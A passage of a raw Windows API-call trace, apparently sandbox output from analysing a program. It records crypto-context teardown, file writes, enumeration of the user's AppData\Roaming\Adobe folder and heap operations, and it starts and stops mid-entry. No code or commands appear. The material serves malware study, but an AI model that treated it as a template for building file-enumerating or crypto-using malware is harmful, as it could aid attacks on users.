lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.850] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a72718*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72718*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0113.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.851] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0113.851] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.851] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0113.851] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.851] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.851] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.852] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.852] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.852] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0113.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa498, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.852] CryptDestroyKey (hKey=0x9a4980) returned 1 [0113.852] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.852] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.852] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.852] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.852] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0113.852] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.853] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.853] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.853] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.853] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.853] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.853] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.853] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.853] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.853] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.853] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.854] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.854] CryptReleaseContext (hProv=0x9be9a0, dwFlags=0x0) returned 1 [0113.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.855] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0113.855] FreeLibrary (hLibModule=0x76390000) returned 1 [0113.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.855] CloseHandle (hObject=0x4ec) returned 1 [0113.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.856] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.856] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.856] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.856] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Adobe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpFilePart=0x8cedf4*="Adobe") returned 0x25 [0113.856] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe")) returned 0x10 [0113.856] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a47c0 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715a3e1e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5380e4e, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7161656c, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715ca081, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7894b39b, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Sonar", cAlternateFileName="")) returned 1 [0113.868] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Sonar", cAlternateFileName="")) returned 0 [0113.868] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0113.869] GetLastError () returned 0x12 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0113.869] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.870] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.870] HeapFree (in: 